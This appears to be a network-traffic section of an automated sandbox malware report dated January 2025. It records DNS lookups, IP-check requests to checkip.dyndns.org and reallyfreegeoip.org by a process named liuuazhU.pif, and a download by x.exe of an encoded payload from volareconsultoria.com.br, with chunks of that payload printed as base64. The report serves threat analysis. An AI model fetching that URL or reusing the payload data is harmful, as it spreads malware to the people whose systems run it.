                                                                                      Jan 16, 2025 08:29:34.740889072 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:34.740919113 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.882496119 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:35.194977999 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.195054054 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.197469950 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.197484970 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.197818995 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.382472992 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.672631979 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.719340086 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773648024 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773720980 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773770094 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.776849031 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:40.956370115 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.961158037 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:40.961431026 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.961503983 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.966259956 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.597172976 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.601150036 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:41.606113911 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.795888901 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.800142050 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.800261021 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.800486088 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.816404104 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.816445112 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.869303942 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:42.282965899 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.283049107 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.287605047 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.287638903 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.288083076 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.330719948 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.375340939 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441792011 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441864967 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441927910 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.444498062 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:30:26.783025026 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:26.783071041 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:30:39.728189945 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:39.732371092 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:30:46.795960903 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:46.796040058 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:01.887059927 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:01.892184973 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:31:14.752636909 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:14.757421017 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:31:21.799676895 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:21.804487944 CET8049742193.122.6.168192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 16, 2025 08:29:13.549662113 CET5502253192.168.2.41.1.1.1
                                                                                      Jan 16, 2025 08:29:14.105671883 CET53550221.1.1.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:20.871078014 CET6401453192.168.2.41.1.1.1
                                                                                      Jan 16, 2025 08:29:20.878156900 CET53640141.1.1.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.789482117 CET6338653192.168.2.41.1.1.1
                                                                                      Jan 16, 2025 08:29:21.796925068 CET53633861.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 16, 2025 08:29:13.549662113 CET192.168.2.41.1.1.10x7b6dStandard query (0)www.volareconsultoria.com.brA (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.871078014 CET192.168.2.41.1.1.10x93cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.789482117 CET192.168.2.41.1.1.10x21ddStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 16, 2025 08:29:14.105671883 CET1.1.1.1192.168.2.40x7b6dNo error (0)www.volareconsultoria.com.brvolareconsultoria.com.brCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:14.105671883 CET1.1.1.1192.168.2.40x7b6dNo error (0)volareconsultoria.com.br50.116.86.44A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:20.878156900 CET1.1.1.1192.168.2.40x93cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 16, 2025 08:29:21.796925068 CET1.1.1.1192.168.2.40x21ddNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.volareconsultoria.com.br
                                                                                      • reallyfreegeoip.org
                                                                                      • checkip.dyndns.org

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449732193.122.6.168801856C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 16, 2025 08:29:20.953425884 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 16, 2025 08:29:21.591346979 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 16, 2025 08:29:21.595254898 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 16, 2025 08:29:21.783902884 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449740193.122.6.168805640C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 16, 2025 08:29:33.900171995 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 16, 2025 08:29:34.532540083 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:34 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 16, 2025 08:29:34.542181969 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 16, 2025 08:29:34.727545023 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:34 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449742193.122.6.168805956C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 16, 2025 08:29:40.961503983 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 16, 2025 08:29:41.597172976 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 16, 2025 08:29:41.601150036 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 16, 2025 08:29:41.795888901 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973150.116.86.444436492C:\Users\user\AppData\Local\Temp\x.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-16 07:29:14 UTC177OUTGET /245_Uhzauuilkul HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                      Host: www.volareconsultoria.com.br
                                                                                      2025-01-16 07:29:14 UTC209INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:14 GMT
                                                                                      Server: Apache
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Last-Modified: Wed, 15 Jan 2025 22:09:33 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 764756
                                                                                      2025-01-16 07:29:14 UTC7983INData Raw: 38 6a 4a 70 47 73 6b 73 64 4b 66 59 48 53 72 6e 48 58 46 46 6f 75 50 4b 67 77 39 45 63 74 45 64 51 68 6d 31 4c 57 37 57 72 70 31 4b 76 51 63 43 54 66 6e 52 58 49 75 33 31 5a 39 55 72 50 6e 30 58 41 48 53 54 4a 72 47 31 61 5a 4b 74 75 74 6c 39 63 35 67 76 6f 74 71 71 2f 65 58 55 65 78 4b 68 2f 69 6f 6d 33 69 32 42 71 42 6a 36 55 35 32 38 37 4f 6a 62 71 76 76 70 6c 59 46 55 47 38 65 35 58 43 4a 35 68 74 38 4d 77 38 37 6b 43 58 57 65 35 37 64 48 34 52 48 43 53 71 58 43 74 4f 42 41 55 42 70 6c 69 73 71 61 76 39 65 30 41 42 68 4e 75 75 70 5a 5a 57 2f 70 44 39 67 6c 36 6c 63 2f 31 4c 43 68 4d 70 38 45 5a 6c 55 4d 44 2f 77 35 7a 53 47 67 4a 64 68 30 67 42 57 4e 30 64 35 44 4a 72 5a 68 6a 33 47 2f 52 30 78 45 74 35 6d 6e 4c 54 65 2f 47 31 73 36 7a 5a 69 39 37 6a
                                                                                      Data Ascii: 8jJpGsksdKfYHSrnHXFFouPKgw9EctEdQhm1LW7Wrp1KvQcCTfnRXIu31Z9UrPn0XAHSTJrG1aZKtutl9c5gvotqq/eXUexKh/iom3i2BqBj6U5287OjbqvvplYFUG8e5XCJ5ht8Mw87kCXWe57dH4RHCSqXCtOBAUBplisqav9e0ABhNuupZZW/pD9gl6lc/1LChMp8EZlUMD/w5zSGgJdh0gBWN0d5DJrZhj3G/R0xEt5mnLTe/G1s6zZi97j
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 68 4a 43 5a 43 75 4e 38 46 76 55 56 61 6f 53 56 35 6b 55 46 42 48 6f 58 4a 6c 58 71 6f 31 39 2f 64 5a 54 54 63 47 77 44 51 5a 67 55 45 66 5a 74 45 70 46 43 4e 6d 62 4f 51 58 4e 65 43 50 54 55 65 7a 56 79 71 52 4f 4e 76 66 6e 2b 32 7a 39 38 69 4b 2f 57 4c 2f 64 57 72 55 43 31 4a 65 68 4f 6c 61 61 32 52 4f 35 78 6a 31 36 4b 2f 4e 38 6d 2b 32 42 75 6b 6c 75 2f 35 4f 50 38 73 34 4b 6e 79 4f 34 7a 30 42 46 36 33 63 6c 31 30 5a 79 38 6b 4a 6b 61 38 4e 58 4e 79 48 68 54 51 37 49 61 34 38 6e 79 54 58 69 6a 4d 6e 46 41 65 75 55 70 4f 6c 33 34 49 45 5a 55 43 68 39 4b 31 52 48 57 47 38 38 77 71 62 77 69 4f 6e 63 58 75 63 72 35 51 68 33 56 30 56 2f 42 75 54 35 47 69 35 78 39 6e 70 76 6d 36 6f 50 5a 6b 48 6f 6d 70 57 71 59 4c 69 4b 30 47 63 45 4e 7a 43 4b 68 38 64 32
                                                                                      Data Ascii: hJCZCuN8FvUVaoSV5kUFBHoXJlXqo19/dZTTcGwDQZgUEfZtEpFCNmbOQXNeCPTUezVyqRONvfn+2z98iK/WL/dWrUC1JehOlaa2RO5xj16K/N8m+2Buklu/5OP8s4KnyO4z0BF63cl10Zy8kJka8NXNyHhTQ7Ia48nyTXijMnFAeuUpOl34IEZUCh9K1RHWG88wqbwiOncXucr5Qh3V0V/BuT5Gi5x9npvm6oPZkHompWqYLiK0GcENzCKh8d2
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 43 68 6c 35 66 73 4d 6d 52 75 32 52 35 78 73 46 4b 59 52 55 76 4d 79 2b 63 54 30 34 6c 61 56 63 43 44 32 38 55 78 59 74 46 55 5a 73 57 35 39 38 30 4f 43 50 64 6a 4e 69 49 4a 69 53 59 74 63 61 30 33 30 6c 6c 71 68 76 61 79 42 36 6b 41 74 47 70 4b 54 54 45 2f 52 56 62 68 51 35 38 71 74 4f 6e 6d 70 6b 79 7a 79 42 72 63 6f 43 6e 6e 52 65 6c 68 32 38 4e 39 6c 31 2b 50 6d 78 6f 68 59 42 4b 4a 35 6f 37 68 62 41 2f 45 77 79 6e 61 36 52 71 2b 39 63 73 54 6c 75 39 31 32 4d 77 51 73 31 74 45 58 48 69 2b 70 6f 6b 4a 72 6e 71 61 37 65 43 59 58 2b 42 7a 32 4c 61 32 2b 49 31 41 54 47 76 76 33 54 58 77 52 6d 38 69 4f 74 76 62 46 6b 54 43 6e 46 47 77 4d 48 4b 39 59 2b 34 46 39 68 45 65 35 65 30 2b 55 42 73 77 58 63 35 57 41 6b 2b 4d 38 30 56 6e 72 70 55 6e 6a 42 55 4a 34
                                                                                      Data Ascii: Chl5fsMmRu2R5xsFKYRUvMy+cT04laVcCD28UxYtFUZsW5980OCPdjNiIJiSYtca030llqhvayB6kAtGpKTTE/RVbhQ58qtOnmpkyzyBrcoCnnRelh28N9l1+PmxohYBKJ5o7hbA/Ewyna6Rq+9csTlu912MwQs1tEXHi+pokJrnqa7eCYX+Bz2La2+I1ATGvv3TXwRm8iOtvbFkTCnFGwMHK9Y+4F9hEe5e0+UBswXc5WAk+M80VnrpUnjBUJ4
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 32 4e 5a 35 33 54 38 4c 4b 54 43 31 6c 73 47 30 39 52 47 77 32 4d 6f 6e 44 6e 42 43 69 77 42 64 67 64 7a 7a 54 58 42 50 4e 48 38 46 57 53 41 2f 30 7a 2b 46 34 67 2b 79 2f 47 6e 65 57 54 48 2f 78 6e 68 33 71 42 6b 76 79 53 6f 6d 49 67 47 6b 79 75 67 47 79 35 58 5a 4c 61 6d 69 43 6f 52 70 68 75 56 62 4c 78 4b 6c 39 79 2b 74 78 55 4f 73 57 73 56 71 6e 38 66 70 36 78 74 5a 62 7a 58 43 37 7a 74 4c 52 68 44 4e 79 33 55 5a 4a 76 6a 30 49 36 72 50 73 2f 54 71 4c 50 68 78 70 56 4c 32 38 45 42 49 4b 46 32 59 4c 32 78 64 78 63 6a 31 58 73 61 78 61 68 51 68 73 39 30 6b 2f 2b 51 50 4f 54 6c 52 7a 45 7a 2f 6c 42 6b 70 57 49 67 4a 70 5a 48 77 6b 4a 73 49 52 30 46 69 6a 45 70 31 78 72 6d 4f 4f 42 72 71 75 75 52 50 4d 45 58 6c 43 72 42 51 35 52 70 72 63 32 63 35 51 48 7a
                                                                                      Data Ascii: 2NZ53T8LKTC1lsG09RGw2MonDnBCiwBdgdzzTXBPNH8FWSA/0z+F4g+y/GneWTH/xnh3qBkvySomIgGkyugGy5XZLamiCoRphuVbLxKl9y+txUOsWsVqn8fp6xtZbzXC7ztLRhDNy3UZJvj0I6rPs/TqLPhxpVL28EBIKF2YL2xdxcj1XsaxahQhs90k/+QPOTlRzEz/lBkpWIgJpZHwkJsIR0FijEp1xrmOOBrquuRPMEXlCrBQ5Rprc2c5QHz
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 65 47 77 48 43 67 74 79 76 75 47 7a 56 51 73 31 66 4e 57 4d 75 47 6e 66 56 67 75 72 56 6a 32 70 72 49 62 71 30 6b 51 5a 6c 62 4b 59 61 47 36 6c 4a 52 72 70 67 4e 53 31 36 33 69 68 55 2f 52 79 35 4a 54 43 78 2b 69 6d 46 54 74 35 5a 63 4b 4b 45 65 72 6b 55 34 4d 6d 34 30 6f 79 31 44 57 42 39 58 42 37 4f 78 50 77 4c 50 78 35 53 51 68 4c 68 52 34 38 77 4a 69 52 4f 57 75 73 59 30 53 79 55 30 66 35 7a 71 41 71 58 6d 47 6d 44 58 6e 4d 4f 44 56 69 32 6f 5a 74 44 41 36 6c 6d 78 75 55 72 73 65 45 2f 6d 52 42 77 32 34 74 69 39 34 68 4d 47 79 51 6b 6c 52 5a 33 72 6a 38 46 79 37 49 2b 75 35 71 57 6c 69 42 48 2f 33 66 41 6d 56 68 76 53 44 49 48 43 62 4d 2f 38 6f 6f 78 5a 43 32 4e 48 66 34 46 57 47 74 32 6d 6f 31 58 4a 33 4b 48 4c 6f 77 58 6f 33 6c 43 47 39 6b 59 74 4c
                                                                                      Data Ascii: eGwHCgtyvuGzVQs1fNWMuGnfVgurVj2prIbq0kQZlbKYaG6lJRrpgNS163ihU/Ry5JTCx+imFTt5ZcKKEerkU4Mm40oy1DWB9XB7OxPwLPx5SQhLhR48wJiROWusY0SyU0f5zqAqXmGmDXnMODVi2oZtDA6lmxuUrseE/mRBw24ti94hMGyQklRZ3rj8Fy7I+u5qWliBH/3fAmVhvSDIHCbM/8ooxZC2NHf4FWGt2mo1XJ3KHLowXo3lCG9kYtL
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 47 68 69 30 6f 77 6f 44 59 72 4e 66 33 76 69 4f 66 76 48 76 67 6c 58 56 76 2f 54 73 30 39 4f 33 77 72 2f 34 71 74 4a 53 51 50 51 64 74 71 50 61 65 4e 74 4b 32 6d 30 4c 51 31 30 76 5a 6e 4d 55 2f 31 38 6f 37 53 48 58 52 67 50 31 4a 76 4f 35 67 59 5a 46 41 41 7a 45 52 38 2b 6c 66 59 43 65 69 4a 58 5a 69 43 39 7a 6c 52 63 50 38 78 35 59 6c 59 62 37 6b 59 44 5a 57 76 66 74 65 61 34 72 48 5a 30 56 5a 51 47 4c 67 6b 62 68 74 4e 79 51 6b 50 65 63 6d 4a 71 63 57 72 38 69 67 77 30 71 77 57 4a 47 57 39 6c 35 64 47 74 67 7a 6d 35 58 66 56 65 2f 77 69 4c 77 53 48 6d 73 69 7a 63 57 64 68 57 48 70 34 6c 62 42 33 48 63 57 6e 4b 39 6f 37 57 53 52 43 52 75 4c 69 6e 6f 6f 30 55 71 2f 65 74 78 71 2f 73 43 37 58 70 52 33 32 39 35 6c 48 46 6e 54 66 6b 51 48 4b 44 77 58 73 66
                                                                                      Data Ascii: Ghi0owoDYrNf3viOfvHvglXVv/Ts09O3wr/4qtJSQPQdtqPaeNtK2m0LQ10vZnMU/18o7SHXRgP1JvO5gYZFAAzER8+lfYCeiJXZiC9zlRcP8x5YlYb7kYDZWvftea4rHZ0VZQGLgkbhtNyQkPecmJqcWr8igw0qwWJGW9l5dGtgzm5XfVe/wiLwSHmsizcWdhWHp4lbB3HcWnK9o7WSRCRuLinoo0Uq/etxq/sC7XpR3295lHFnTfkQHKDwXsf
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 42 30 37 76 2b 58 73 61 74 71 55 66 62 30 52 35 7a 4f 67 79 2b 57 47 79 75 33 70 42 49 57 63 51 36 53 76 35 57 30 51 75 55 5a 43 73 6d 4a 4c 4e 58 6a 4b 34 6b 4a 75 63 75 70 70 79 55 4b 42 50 30 6c 79 51 6b 6b 6e 49 31 67 75 4c 55 30 76 73 46 75 4d 61 56 73 68 49 33 68 53 6e 42 4d 78 67 56 66 65 4b 67 30 2f 6b 6c 6b 35 30 4e 45 63 50 44 67 6c 4e 57 45 6e 79 78 49 54 41 51 55 46 4f 69 6d 30 71 52 43 53 6c 50 6c 35 54 2f 46 6c 76 77 43 50 6a 35 50 7a 59 33 35 6a 6e 73 38 30 62 5a 4a 66 71 2f 58 43 4d 6f 6a 61 37 6b 31 53 64 51 41 70 50 77 51 35 73 6b 4a 6b 69 70 6c 39 4c 36 6f 6a 2b 51 37 36 53 6c 51 78 6c 4f 63 6c 65 4f 64 32 72 35 6f 52 4b 4b 70 6e 32 67 70 44 4b 5a 42 63 41 7a 50 73 59 45 2f 62 76 6d 55 64 78 53 55 7a 6b 56 46 5a 75 78 4a 43 54 70 4f 52
                                                                                      Data Ascii: B07v+XsatqUfb0R5zOgy+WGyu3pBIWcQ6Sv5W0QuUZCsmJLNXjK4kJucuppyUKBP0lyQkknI1guLU0vsFuMaVshI3hSnBMxgVfeKg0/klk50NEcPDglNWEnyxITAQUFOim0qRCSlPl5T/FlvwCPj5PzY35jns80bZJfq/XCMoja7k1SdQApPwQ5skJkipl9L6oj+Q76SlQxlOcleOd2r5oRKKpn2gpDKZBcAzPsYE/bvmUdxSUzkVFZuxJCTpOR
